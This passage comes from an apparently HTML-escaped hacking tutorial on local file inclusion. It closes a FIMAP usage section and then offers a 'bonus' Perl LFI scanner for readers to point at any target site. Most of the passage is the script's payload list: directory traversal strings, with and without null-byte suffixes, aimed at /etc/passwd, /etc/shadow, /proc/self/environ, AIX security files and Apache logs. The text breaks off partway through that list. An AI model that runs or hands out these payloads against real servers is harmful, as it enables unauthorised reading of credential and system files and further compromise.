&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;COMMAND:&lt;/b&gt; fimap.py --test-rfi&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;This covers the basic usage for FIMAP. This tool is still under development so I encourage you to follow the project for more updates to come. If you want to truly learn how LFI works, then I encourage you to try this out manually after you have found a few with the assistance of the tool. I have also included a modified Perl script below which does some more thorough testing for file presence but is not nearly as full featured, nor is it the quietest tool. Please use responsibly and until next time, Enjoy!&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;u&gt;&lt;span style="font-family: Calibri;"&gt;BONUS PERL LFI SCRIPT:&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin: 0in 0in 0pt;"&gt;&lt;span style="font-size: 8pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;span style="font-family: Calibri;"&gt;Save the below as “file.pl” and then run using “perl file.pl” and then just enter your target site…&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
#!/usr/bin/perl&lt;br /&gt;
#modified by: Hood3dRob1n&lt;br /&gt;
use LWP::UserAgent;&lt;br /&gt;
use HTTP::Request;&lt;br /&gt;
system($^O eq 'MSWin32' ? 'cls' : 'clear');&lt;br /&gt;
print "=======================================================\n";&lt;br /&gt;
print "=                                                     =\n";&lt;br /&gt;
print "=                 LFI_scanner v 0.1.5                 =\n";&lt;br /&gt;
print "=              ~[ HR Updated Version ]~               =\n";&lt;br /&gt;
print "=                                                     =\n";&lt;br /&gt;
print "=     input the site: www.memek.com/index.php?id=     =\n";&lt;br /&gt;
print "=                                                     =\n";&lt;br /&gt;
print "=======================================================\n\n";&lt;br /&gt;
print '&amp;gt;';chomp($link = &amp;lt;STDIN&amp;gt;);&lt;br /&gt;
if($link !~ /http:\/\//) { $link = "http://$link"; }&lt;br /&gt;
#httpd type scan&lt;br /&gt;
print "\n&amp;gt;press [enter] to check the version of httpd[...]\n";&lt;br /&gt;
$httpd =&amp;lt;STDIN&amp;gt;;&lt;br /&gt;
$host = $link;&lt;br /&gt;
$useragent = LWP::UserAgent-&amp;gt;new;&lt;br /&gt;
$resp = $useragent-&amp;gt;head($host);&lt;br /&gt;
print $resp-&amp;gt;headers_as_string;&lt;br /&gt;
print "\n&amp;gt;press [enter] to check the vulnerability in lfi[...]\n";&lt;br /&gt;
$start =&amp;lt;STDIN&amp;gt;;&lt;br /&gt;
@vuls = ('/etc/passwd',&lt;br /&gt;
'../etc/passwd',&lt;br /&gt;
'../../etc/passwd',&lt;br /&gt;
'../../../etc/passwd',&lt;br /&gt;
'../../../../etc/passwd',&lt;br /&gt;
'../../../../../etc/passwd',&lt;br /&gt;
'../../../../../../etc/passwd',&lt;br /&gt;
'../../../../../../../etc/passwd',&lt;br /&gt;
'../../../../../../../../etc/passwd',&lt;br /&gt;
'../../../../../../../../../etc/passwd',&lt;br /&gt;
'../../../../../../../../../../etc/passwd',&lt;br /&gt;
'../../../../../../../../../../../etc/passwd',&lt;br /&gt;
'../etc/passwd%00',&lt;br /&gt;
'../../etc/passwd%00',&lt;br /&gt;
'../../../etc/passwd%00',&lt;br /&gt;
'../../../../etc/passwd%00',&lt;br /&gt;
'../../../../../etc/passwd%00',&lt;br /&gt;
'../../../../../../etc/passwd%00',&lt;br /&gt;
'../../../../../../../etc/passwd%00',&lt;br /&gt;
'../../../../../../../../etc/passwd%00',&lt;br /&gt;
'../../../../../../../../../etc/passwd%00',&lt;br /&gt;
'../../../../../../../../../../etc/passwd%00',&lt;br /&gt;
'../../../../../../../../../../../etc/passwd%00',&lt;br /&gt;
'/proc/self/environ',&lt;br /&gt;
'../proc/self/environ',&lt;br /&gt;
'../../proc/self/environ',&lt;br /&gt;
'../../../proc/self/environ',&lt;br /&gt;
'../../../../proc/self/environ',&lt;br /&gt;
'../../../../../proc/self/environ',&lt;br /&gt;
'../../../../../../proc/self/environ',&lt;br /&gt;
'../../../../../../../proc/self/environ',&lt;br /&gt;
'../../../../../../../../proc/self/environ',&lt;br /&gt;
'../../../../../../../../../proc/self/environ',&lt;br /&gt;
'../../../../../../../../../../proc/self/environ',&lt;br /&gt;
'../../../../../../../../../../../proc/self/environ',&lt;br /&gt;
'/proc/self/environ%00',&lt;br /&gt;
'../proc/self/environ%00',&lt;br /&gt;
'../../proc/self/environ%00',&lt;br /&gt;
'../../../proc/self/environ%00',&lt;br /&gt;
'../../../../proc/self/environ%00',&lt;br /&gt;
'../../../../../proc/self/environ%00',&lt;br /&gt;
'../../../../../../proc/self/environ%00',&lt;br /&gt;
'../../../../../../../proc/self/environ%00',&lt;br /&gt;
'../../../../../../../../proc/self/environ%00',&lt;br /&gt;
'../../../../../../../../../proc/self/environ%00',&lt;br /&gt;
'../../../../../../../../../../proc/self/environ%00',&lt;br /&gt;
'../../../../../../../../../../../proc/self/environ%00',&lt;br /&gt;
'/etc/group',&lt;br /&gt;
'../etc/group',&lt;br /&gt;
'../../etc/group',&lt;br /&gt;
'../../../etc/group',&lt;br /&gt;
'../../../../etc/group',&lt;br /&gt;
'../../../../../etc/group',&lt;br /&gt;
'../../../../../../etc/group',&lt;br /&gt;
'../../../../../../../etc/group',&lt;br /&gt;
'../../../../../../../../etc/group',&lt;br /&gt;
'../../../../../../../../../etc/group',&lt;br /&gt;
'../../../../../../../../../../etc/group',&lt;br /&gt;
'../../../../../../../../../../../etc/group',&lt;br /&gt;
'/etc/group%00',&lt;br /&gt;
'../etc/group%00',&lt;br /&gt;
'../../etc/group%00',&lt;br /&gt;
'../../../etc/group%00',&lt;br /&gt;
'../../../../etc/group%00',&lt;br /&gt;
'../../../../../etc/group%00',&lt;br /&gt;
'../../../../../../etc/group%00',&lt;br /&gt;
'../../../../../../../etc/group%00',&lt;br /&gt;
'../../../../../../../../etc/group%00',&lt;br /&gt;
'../../../../../../../../../etc/group%00',&lt;br /&gt;
'../../../../../../../../../../etc/group%00',&lt;br /&gt;
'../../../../../../../../../../../etc/group%00',&lt;br /&gt;
'/etc/security/group',&lt;br /&gt;
'../etc/security/group',&lt;br /&gt;
'../../etc/security/group',&lt;br /&gt;
'../../../etc/security/group',&lt;br /&gt;
'../../../../etc/security/group',&lt;br /&gt;
'../../../../../etc/security/group',&lt;br /&gt;
'../../../../../../etc/security/group',&lt;br /&gt;
'../../../../../../../etc/security/group',&lt;br /&gt;
'../../../../../../../../etc/security/group',&lt;br /&gt;
'../../../../../../../../../etc/security/group',&lt;br /&gt;
'../../../../../../../../../../etc/security/group',&lt;br /&gt;
'../../../../../../../../../../../etc/security/group',&lt;br /&gt;
'/etc/security/group%00',&lt;br /&gt;
'../etc/security/group%00',&lt;br /&gt;
'../../etc/security/group%00',&lt;br /&gt;
'../../../etc/security/group%00',&lt;br /&gt;
'../../../../etc/security/group%00',&lt;br /&gt;
'../../../../../etc/security/group%00',&lt;br /&gt;
'../../../../../../etc/security/group%00',&lt;br /&gt;
'../../../../../../../etc/security/group%00',&lt;br /&gt;
'../../../../../../../../etc/security/group%00',&lt;br /&gt;
'../../../../../../../../../etc/security/group%00',&lt;br /&gt;
'../../../../../../../../../../etc/security/group%00',&lt;br /&gt;
'../../../../../../../../../../../etc/security/group%00',&lt;br /&gt;
'/etc/user',&lt;br /&gt;
'../etc/user',&lt;br /&gt;
'../../etc/user',&lt;br /&gt;
'../../../etc/user',&lt;br /&gt;
'../../../../etc/user',&lt;br /&gt;
'../../../../../etc/user',&lt;br /&gt;
'../../../../../../etc/user',&lt;br /&gt;
'../../../../../../../etc/user',&lt;br /&gt;
'../../../../../../../../etc/user',&lt;br /&gt;
'../../../../../../../../../etc/user',&lt;br /&gt;
'../../../../../../../../../../etc/user',&lt;br /&gt;
'../../../../../../../../../../../etc/user',&lt;br /&gt;
'/etc/user%00',&lt;br /&gt;
'../etc/user%00',&lt;br /&gt;
'../../etc/user%00',&lt;br /&gt;
'../../../etc/user%00',&lt;br /&gt;
'../../../../etc/user%00',&lt;br /&gt;
'../../../../../etc/user%00',&lt;br /&gt;
'../../../../../../etc/user%00',&lt;br /&gt;
'../../../../../../../etc/user%00',&lt;br /&gt;
'../../../../../../../../etc/user%00',&lt;br /&gt;
'../../../../../../../../../etc/user%00',&lt;br /&gt;
'../../../../../../../../../../etc/user%00',&lt;br /&gt;
'../../../../../../../../../../../etc/user%00',&lt;br /&gt;
'/etc/shadow',&lt;br /&gt;
'../etc/shadow',&lt;br /&gt;
'../../etc/shadow',&lt;br /&gt;
'../../../etc/shadow',&lt;br /&gt;
'../../../../etc/shadow',&lt;br /&gt;
'../../../../../etc/shadow',&lt;br /&gt;
'../../../../../../etc/shadow',&lt;br /&gt;
'../../../../../../../etc/shadow',&lt;br /&gt;
'../../../../../../../../etc/shadow',&lt;br /&gt;
'../../../../../../../../../etc/shadow',&lt;br /&gt;
'../../../../../../../../../../etc/shadow',&lt;br /&gt;
'../../../../../../../../../../../etc/shadow',&lt;br /&gt;
'/etc/shadow%00',&lt;br /&gt;
'../etc/shadow%00',&lt;br /&gt;
'../../etc/shadow%00',&lt;br /&gt;
'../../../etc/shadow%00',&lt;br /&gt;
'../../../../etc/shadow%00',&lt;br /&gt;
'../../../../../etc/shadow%00',&lt;br /&gt;
'../../../../../../etc/shadow%00',&lt;br /&gt;
'../../../../../../../etc/shadow%00',&lt;br /&gt;
'../../../../../../../../etc/shadow%00',&lt;br /&gt;
'../../../../../../../../../etc/shadow%00',&lt;br /&gt;
'../../../../../../../../../../etc/shadow%00',&lt;br /&gt;
'../../../../../../../../../../../etc/shadow%00',&lt;br /&gt;
'/etc/security/passwd',&lt;br /&gt;
'../etc/security/passwd',&lt;br /&gt;
'../../etc/security/passwd',&lt;br /&gt;
'../../../etc/security/passwd',&lt;br /&gt;
'../../../../etc/security/passwd',&lt;br /&gt;
'../../../../../etc/security/passwd',&lt;br /&gt;
'../../../../../../etc/security/passwd',&lt;br /&gt;
'../../../../../../../etc/security/passwd',&lt;br /&gt;
'../../../../../../../../etc/security/passwd',&lt;br /&gt;
'../../../../../../../../../etc/security/passwd',&lt;br /&gt;
'../../../../../../../../../../etc/security/passwd',&lt;br /&gt;
'../../../../../../../../../../../etc/security/passwd',&lt;br /&gt;
'/etc/security/passwd%00',&lt;br /&gt;
'../etc/security/passwd%00',&lt;br /&gt;
'../../etc/security/passwd%00',&lt;br /&gt;
'../../../etc/security/passwd%00',&lt;br /&gt;
'../../../../etc/security/passwd%00',&lt;br /&gt;
'../../../../../etc/security/passwd%00',&lt;br /&gt;
'../../../../../../etc/security/passwd%00',&lt;br /&gt;
'../../../../../../../etc/security/passwd%00',&lt;br /&gt;
'../../../../../../../../etc/security/passwd%00',&lt;br /&gt;
'../../../../../../../../../etc/security/passwd%00',&lt;br /&gt;
'../../../../../../../../../../etc/security/passwd%00',&lt;br /&gt;
'../../../../../../../../../../../etc/security/passwd%00',&lt;br /&gt;
'/etc/security/user',&lt;br /&gt;
'../etc/security/user',&lt;br /&gt;
'../../etc/security/user',&lt;br /&gt;
'../../../etc/security/user',&lt;br /&gt;
'../../../../etc/security/user',&lt;br /&gt;
'../../../../../etc/security/user',&lt;br /&gt;
'../../../../../../etc/security/user',&lt;br /&gt;
'../../../../../../../etc/security/user',&lt;br /&gt;
'../../../../../../../../etc/security/user',&lt;br /&gt;
'../../../../../../../../../etc/security/user',&lt;br /&gt;
'../../../../../../../../../../etc/security/user',&lt;br /&gt;
'../../../../../../../../../../../etc/security/user',&lt;br /&gt;
'/etc/security/user%00',&lt;br /&gt;
'../etc/security/user%00',&lt;br /&gt;
'../../etc/security/user%00',&lt;br /&gt;
'../../../etc/security/user%00',&lt;br /&gt;
'../../../../etc/security/user%00',&lt;br /&gt;
'../../../../../etc/security/user%00',&lt;br /&gt;
'../../../../../../etc/security/user%00',&lt;br /&gt;
'../../../../../../../etc/security/user%00',&lt;br /&gt;
'../../../../../../../../etc/security/user%00',&lt;br /&gt;
'../../../../../../../../../etc/security/user%00',&lt;br /&gt;
'../../../../../../../../../../etc/security/user%00',&lt;br /&gt;
'../../../../../../../../../../../etc/security/user%00',&lt;br /&gt;
'/etc/security/environ',&lt;br /&gt;
'../etc/security/environ',&lt;br /&gt;
'../../etc/security/environ',&lt;br /&gt;
'../../../etc/security/environ',&lt;br /&gt;
'../../../../etc/security/environ',&lt;br /&gt;
'../../../../../etc/security/environ',&lt;br /&gt;
'../../../../../../etc/security/environ',&lt;br /&gt;
'../../../../../../../etc/security/environ',&lt;br /&gt;
'../../../../../../../../etc/security/environ',&lt;br /&gt;
'../../../../../../../../../etc/security/environ',&lt;br /&gt;
'../../../../../../../../../../etc/security/environ',&lt;br /&gt;
'../../../../../../../../../../../etc/security/environ',&lt;br /&gt;
'/etc/security/environ%00',&lt;br /&gt;
'../etc/security/environ%00',&lt;br /&gt;
'../../etc/security/environ%00',&lt;br /&gt;
'../../../etc/security/environ%00',&lt;br /&gt;
'../../../../etc/security/environ%00',&lt;br /&gt;
'../../../../../etc/security/environ%00',&lt;br /&gt;
'../../../../../../etc/security/environ%00',&lt;br /&gt;
'../../../../../../../etc/security/environ%00',&lt;br /&gt;
'../../../../../../../../etc/security/environ%00',&lt;br /&gt;
'../../../../../../../../../etc/security/environ%00',&lt;br /&gt;
'../../../../../../../../../../etc/security/environ%00',&lt;br /&gt;
'../../../../../../../../../../../etc/security/environ%00',&lt;br /&gt;
'/etc/security/limits',&lt;br /&gt;
'../etc/security/limits',&lt;br /&gt;
'../../etc/security/limits',&lt;br /&gt;
'../../../etc/security/limits',&lt;br /&gt;
'../../../../etc/security/limits',&lt;br /&gt;
'../../../../../etc/security/limits',&lt;br /&gt;
'../../../../../../etc/security/limits',&lt;br /&gt;
'../../../../../../../etc/security/limits',&lt;br /&gt;
'../../../../../../../../etc/security/limits',&lt;br /&gt;
'../../../../../../../../../etc/security/limits',&lt;br /&gt;
'../../../../../../../../../../etc/security/limits',&lt;br /&gt;
'../../../../../../../../../../../etc/security/limits',&lt;br /&gt;
'/etc/security/limits%00',&lt;br /&gt;
'../etc/security/limits%00',&lt;br /&gt;
'../../etc/security/limits%00',&lt;br /&gt;
'../../../etc/security/limits%00',&lt;br /&gt;
'../../../../etc/security/limits%00',&lt;br /&gt;
'../../../../../etc/security/limits%00',&lt;br /&gt;
'../../../../../../etc/security/limits%00',&lt;br /&gt;
'../../../../../../../etc/security/limits%00',&lt;br /&gt;
'../../../../../../../../etc/security/limits%00',&lt;br /&gt;
'../../../../../../../../../etc/security/limits%00',&lt;br /&gt;
'../../../../../../../../../../etc/security/limits%00',&lt;br /&gt;
'../../../../../../../../../../../etc/security/limits%00',&lt;br /&gt;
'/usr/lib/security/mkuser.default',&lt;br /&gt;
'../usr/lib/security/mkuser.default',&lt;br /&gt;
'../../usr/lib/security/mkuser.default',&lt;br /&gt;
'../../../usr/lib/security/mkuser.default',&lt;br /&gt;
'../../../../usr/lib/security/mkuser.default',&lt;br /&gt;
'../../../../../usr/lib/security/mkuser.default',&lt;br /&gt;
'../../../../../../usr/lib/security/mkuser.default',&lt;br /&gt;
'../../../../../../../usr/lib/security/mkuser.default',&lt;br /&gt;
'../../../../../../../../usr/lib/security/mkuser.default',&lt;br /&gt;
'../../../../../../../../../usr/lib/security/mkuser.default',&lt;br /&gt;
'../../../../../../../../../../usr/lib/security/mkuser.default',&lt;br /&gt;
'../../../../../../../../../../../usr/lib/security/mkuser.default',&lt;br /&gt;
'/usr/lib/security/mkuser.default%00',&lt;br /&gt;
'../usr/lib/security/mkuser.default%00',&lt;br /&gt;
'../../usr/lib/security/mkuser.default%00',&lt;br /&gt;
'../../../usr/lib/security/mkuser.default%00',&lt;br /&gt;
'../../../../usr/lib/security/mkuser.default%00',&lt;br /&gt;
'../../../../../usr/lib/security/mkuser.default%00',&lt;br /&gt;
'../../../../../../usr/lib/security/mkuser.default%00',&lt;br /&gt;
'../../../../../../../usr/lib/security/mkuser.default%00',&lt;br /&gt;
'../../../../../../../../usr/lib/security/mkuser.default%00',&lt;br /&gt;
'../../../../../../../../../usr/lib/security/mkuser.default%00',&lt;br /&gt;
'../../../../../../../../../../usr/lib/security/mkuser.default%00',&lt;br /&gt;
'../../../../../../../../../../../usr/lib/security/mkuser.default%00',&lt;br /&gt;
'/apache/logs/access.log',&lt;br /&gt;
'../apache/logs/access.log',&lt;br /&gt;
'../../apache/logs/access.log',&lt;br /&gt;
'../../../apache/logs/access.log',&lt;br /&gt;
'../../../../apache/logs/access.log',&lt;br /&gt;
'../../../../../apache/logs/access.log',&lt;br /&gt;
'../../../../../../apache/logs/access.log',&lt;br /&gt;
'../../../../../../../apache/logs/access.log',&lt;br /&gt;
'../../../../../../../../apache/logs/access.log',&lt;br /&gt;
'../../../../../../../../../apache/logs/access.log',&lt;br /&gt;
'../../../../../../../../../../apache/logs/access.log',&lt;br /&gt;
'../../../../../../../../../../../apache/logs/access.log',&lt;br /&gt;
'/apache/logs/access.log%00',&lt;br /&gt;
'../apache/logs/access.log%00',&lt;br /&gt;
'../../apache/logs/access.log%00',&lt;br /&gt;
'../../../apache/logs/access.log%00',&lt;br /&gt;
'../../../../apache/logs/access.log%00',&lt;br /&gt;
'../../../../../apache/logs/access.log%00',&lt;br /&gt;
'../../../../../../apache/logs/access.log%00',&lt;br /&gt;
'../../../../../../../apache/logs/access.log%00',&lt;br /&gt;
'../../../../../../../../apache/logs/access.log%00',&lt;br /&gt;
'../../../../../../../../../apache/logs/access.log%00',&lt;br /&gt;
'../../../../../../../../../../apache/logs/access.log%00',&lt;br /&gt;
'../../../../../../../../../../../apache/logs/access.log%00',&lt;br /&gt;
'/apache/logs/error.log',&lt;br /&gt;
'../apache/logs/error.log',&lt;br /&gt;
'../../apache/logs/error.log',&lt;br /&gt;
'../../../apache/logs/error.log',&lt;br /&gt;
'../../../../apache/logs/error.log',&lt;br /&gt;
'../../../../../apache/logs/error.log',&lt;br /&gt;
'../../../../../../apache/logs/error.log',&lt;br /&gt;
'../../../../../../../apache/logs/error.log',&lt;br /&gt;
'../../../../../../../../apache/logs/error.log',&lt;br /&gt;
'../../../../../../../../../apache/logs/error.log',&lt;br /&gt;
'../../../../../../../../../../apache/logs/error.log',&lt;br /&gt;
'../../../../../../../../../../../apache/logs/error.log',&lt;br /&gt;
'/apache/logs/error.log%00',&lt;br /&gt;
'../apache/logs/error.log%00',&lt;br /&gt;
'../../apache/logs/error.log%00',&lt;br /&gt;
'../../../apache/logs/error.log%00',&lt;br /&gt;
'../../../../apache/logs/error.log%00',&lt;br /&gt;
'../../../../../apache/logs/error.log%00',&lt;br /&gt;
'../../../../../../apache/logs/error.log%00',&lt;br /&gt;
'../../../../../../../apache/logs/error.log%00',&lt;br /&gt;
'../../../../../../../../apache/logs/error.log%00',&lt;br /&gt;
'../../../../../../../../../apache/logs/error.log%00',&lt;br /&gt;
'../../../../../../../../../../apache/logs/error.log%00',&lt;br /&gt;
'../../../../../../../../../../../apache/logs/error.log%00',&lt;br /&gt;
'/etc/httpd/logs/acces_log',&lt;br /&gt;
'../etc/httpd/logs/acces_log',&lt;br /&gt;
'../../etc/httpd/logs/acces_log',&lt;br /&gt;
'../../../etc/httpd/logs/acces_log',&lt;br /&gt;
'../../../../etc/httpd/logs/acces_log',&lt;br /&gt;
'../../../../../etc/httpd/logs/acces_log',&lt;br /&gt;
'../../../../../../etc/httpd/logs/acces_log',&lt;br /&gt;
'../../../../../../../etc/httpd/logs/acces_log',&lt;br /&gt;
'../../../../../../../../etc/httpd/logs/acces_log',&lt;br /&gt;
'../../../../../../../../../etc/httpd/logs/acces_log',&lt;br /&gt;
'../../../../../../../../../../etc/httpd/logs/acces_log',&lt;br /&gt;
'../../../../../../../../../../../etc/httpd/logs/acces_log',&lt;br /&gt;
'/etc/httpd/logs/acces_log%00',&lt;br /&gt;
'../etc/httpd/logs/acces_log%00',&lt;br /&gt;
'../../etc/httpd/logs/acces_log%00',&lt;br /&gt;
'../../../etc/httpd/logs/acces_log%00',&lt;br /&gt;
'../../../../etc/httpd/logs/acces_log%00',&lt;br /&gt;
'../../../../../etc/httpd/logs/acces_log%00',&lt;br /&gt;
'../../../../../../etc/httpd/logs/acces_log%00',&lt;br /&gt;
'../../../../../../../etc/httpd/logs/acces_log%00',&lt;br /&gt;
'../../../../../../../../etc/httpd/logs/acces_log%00',&lt;br /&gt;
'../../../../../../../../../etc/httpd/logs/acces_log%00',&lt;br /&gt;
'../../../../../../../../../../etc/httpd/logs/acces_log%00',&lt;br /&gt;
'../../../../../../../../../../../etc/httpd/logs/acces_log%00',&lt;br /&gt;
'/etc/httpd/logs/error_log',&lt;br /&gt;
'../etc/httpd/logs/error_log',&lt;br /&gt;
'../../etc/httpd/logs/error_log',&lt;br /&gt;
'../../../etc/httpd/logs/error_log',&lt;br /&gt;
'../../../../etc/httpd/logs/error_log',&lt;br /&gt;
'../../../../../etc/httpd/logs/error_log',&lt;br /&gt;
'../../../../../../etc/httpd/logs/error_log',&lt;br /&gt;
'../../../../../../../etc/httpd/logs/error_log',&lt;br /&gt;
'../../../../../../../../etc/httpd/logs/error_log',&lt;br /&gt;
'../../../../../../../../../etc/httpd/logs/error_log',&lt;br /&gt;
'../../../../../../../../../../etc/httpd/logs/error_log',&lt;br /&gt;
'../../../../../../../../../../../etc/httpd/logs/error_log',&lt;br /&gt;
'/etc/httpd/logs/error_log%00',&lt;br /&gt;
'../etc/httpd/logs/error_log%00',&lt;br /&gt;
'../../etc/httpd/logs/error_log%00',&lt;br /&gt;
'../../../etc/httpd/logs/error_log%00',&lt;br /&gt;
'../../../../etc/httpd/logs/error_log%00',&lt;br /&gt;
'../../../../../etc/httpd/logs/error_log%00',&lt;br /&gt;
'../../../../../../etc/httpd/logs/error_log%00',&lt;br /&gt;
'../../../../../../../etc/httpd/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../etc/httpd/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../../etc/httpd/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../../../etc/httpd/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../../../../etc/httpd/logs/error_log%00',&lt;br /&gt;
'/var/www/logs/access_log',&lt;br /&gt;
'../var/www/logs/access_log',&lt;br /&gt;
'../../var/www/logs/access_log',&lt;br /&gt;
'../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../../../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../../../../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../../../../../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../../../../../../../../var/www/logs/access_log',&lt;br /&gt;
'/var/www/logs/access_log%00',&lt;br /&gt;
'../var/www/logs/access_log%00',&lt;br /&gt;
'../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../../../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../../../../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../../../../../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../../../../../../../../var/www/logs/access_log%00',&lt;br /&gt;
'/var/www/logs/error_log',&lt;br /&gt;
'../var/www/logs/error_log',&lt;br /&gt;
'../../var/www/logs/error_log',&lt;br /&gt;
'../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../../../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../../../../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../../../../../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../../../../../../../../var/www/logs/error_log',&lt;br /&gt;
'/var/www/logs/error_log%00',&lt;br /&gt;
'../var/www/logs/error_log%00',&lt;br /&gt;
'../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../../../../var/www/logs/error_log%00',&lt;br /&gt;
'/usr/local/apache/logs/access_ log',&lt;br /&gt;
'../usr/local/apache/logs/access_ log',&lt;br /&gt;
'../../usr/local/apache/logs/access_ log',&lt;br /&gt;
'../../../usr/local/apache/logs/access_ log',&lt;br /&gt;
'../../../../usr/local/apache/logs/access_ log',&lt;br /&gt;
'../../../../../usr/local/apache/logs/access_ log',&lt;br /&gt;
'../../../../../../usr/local/apache/logs/access_ log',&lt;br /&gt;
'../../../../../../../usr/local/apache/logs/access_ log',&lt;br /&gt;
'../../../../../../../../usr/local/apache/logs/access_ log',&lt;br /&gt;
'../../../../../../../../../usr/local/apache/logs/access_ log',&lt;br /&gt;
'../../../../../../../../../../usr/local/apache/logs/access_ log',&lt;br /&gt;
'../../../../../../../../../../../usr/local/apache/logs/access_ log',&lt;br /&gt;
'/usr/local/apache/logs/access_ log%00',&lt;br /&gt;
'../usr/local/apache/logs/access_ log%00',&lt;br /&gt;
'../../usr/local/apache/logs/access_ log%00',&lt;br /&gt;
'../../../usr/local/apache/logs/access_ log%00',&lt;br /&gt;
'../../../../usr/local/apache/logs/access_ log%00',&lt;br /&gt;
'../../../../../usr/local/apache/logs/access_ log%00',&lt;br /&gt;
'../../../../../../usr/local/apache/logs/access_ log%00',&lt;br /&gt;
'../../../../../../../usr/local/apache/logs/access_ log%00',&lt;br /&gt;
'../../../../../../../../usr/local/apache/logs/access_ log%00',&lt;br /&gt;
'../../../../../../../../../usr/local/apache/logs/access_ log%00',&lt;br /&gt;
'../../../../../../../../../../usr/local/apache/logs/access_ log%00',&lt;br /&gt;
'../../../../../../../../../../../usr/local/apache/logs/access_ log%00',&lt;br /&gt;
'/usr/local/apache/logs/error_ log',&lt;br /&gt;
'../usr/local/apache/logs/error_ log',&lt;br /&gt;
'../../usr/local/apache/logs/error_ log',&lt;br /&gt;
'../../../usr/local/apache/logs/error_ log',&lt;br /&gt;
'../../../../usr/local/apache/logs/error_ log',&lt;br /&gt;
'../../../../../usr/local/apache/logs/error_ log',&lt;br /&gt;
'../../../../../../usr/local/apache/logs/error_ log',&lt;br /&gt;
'../../../../../../../usr/local/apache/logs/error_ log',&lt;br /&gt;
'../../../../../../../../usr/local/apache/logs/error_ log',&lt;br /&gt;
'../../../../../../../../../usr/local/apache/logs/error_ log',&lt;br /&gt;
'../../../../../../../../../../usr/local/apache/logs/error_ log',&lt;br /&gt;
'../../../../../../../../../../../usr/local/apache/logs/error_ log',&lt;br /&gt;
'/usr/local/apache/logs/error_ log%00',&lt;br /&gt;
'../usr/local/apache/logs/error_ log%00',&lt;br /&gt;
'../../usr/local/apache/logs/error_ log%00',&lt;br /&gt;
'../../../usr/local/apache/logs/error_ log%00',&lt;br /&gt;
'../../../../usr/local/apache/logs/error_ log%00',&lt;br /&gt;
'../../../../../usr/local/apache/logs/error_ log%00',&lt;br /&gt;
'../../../../../../usr/local/apache/logs/error_ log%00',&lt;br /&gt;
'../../../../../../../usr/local/apache/logs/error_ log%00',&lt;br /&gt;
'../../../../../../../../usr/local/apache/logs/error_ log%00',&lt;br /&gt;
'../../../../../../../../../usr/local/apache/logs/error_ log%00',&lt;br /&gt;
'../../../../../../../../../../usr/local/apache/logs/error_ log%00',&lt;br /&gt;
'../../../../../../../../../../../usr/local/apache/logs/error_ log%00',&lt;br /&gt;
'/var/log/apache/access_log',&lt;br /&gt;
'../var/log/apache/access_log',&lt;br /&gt;
'../../var/log/apache/access_log',&lt;br /&gt;
'../../../var/log/apache/access_log',&lt;br /&gt;
'../../../../var/log/apache/access_log',&lt;br /&gt;
'../../../../../var/log/apache/access_log',&lt;br /&gt;
'../../../../../../var/log/apache/access_log',&lt;br /&gt;
'../../../../../../../var/log/apache/access_log',&lt;br /&gt;
'../../../../../../../../var/log/apache/access_log',&lt;br /&gt;
'../../../../../../../../../var/log/apache/access_log',&lt;br /&gt;
'../../../../../../../../../../var/log/apache/access_log',&lt;br /&gt;
'../../../../../../../../../../../var/log/apache/access_log',&lt;br /&gt;
'/var/log/apache/access_log%00',&lt;br /&gt;
'../var/log/apache/access_log%00',&lt;br /&gt;
'../../var/log/apache/access_log%00',&lt;br /&gt;
'../../../var/log/apache/access_log%00',&lt;br /&gt;
'../../../../var/log/apache/access_log%00',&lt;br /&gt;
